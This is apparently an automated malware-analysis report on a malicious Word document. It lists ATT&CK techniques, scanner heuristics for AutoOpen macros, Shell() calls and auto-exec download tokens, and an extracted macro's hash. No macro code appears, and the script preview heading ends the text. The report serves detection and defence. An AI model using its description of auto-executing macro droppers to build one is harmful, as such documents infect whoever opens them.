Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Autoopen macro calls a function that uses the Shell() command to execute a string. This string appears to be an obfuscated command that likely downloads and executes a second-stage payload. The ClamAV detection and multiple VBA heuristics confirm its malicious nature.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6574812-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6574812-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11627 bytes | 75972920575e5c0f0a836719046152da0462aa8116116962d996ffa54ac66cd9 |
Preview: first 1,000 lines of the extracted script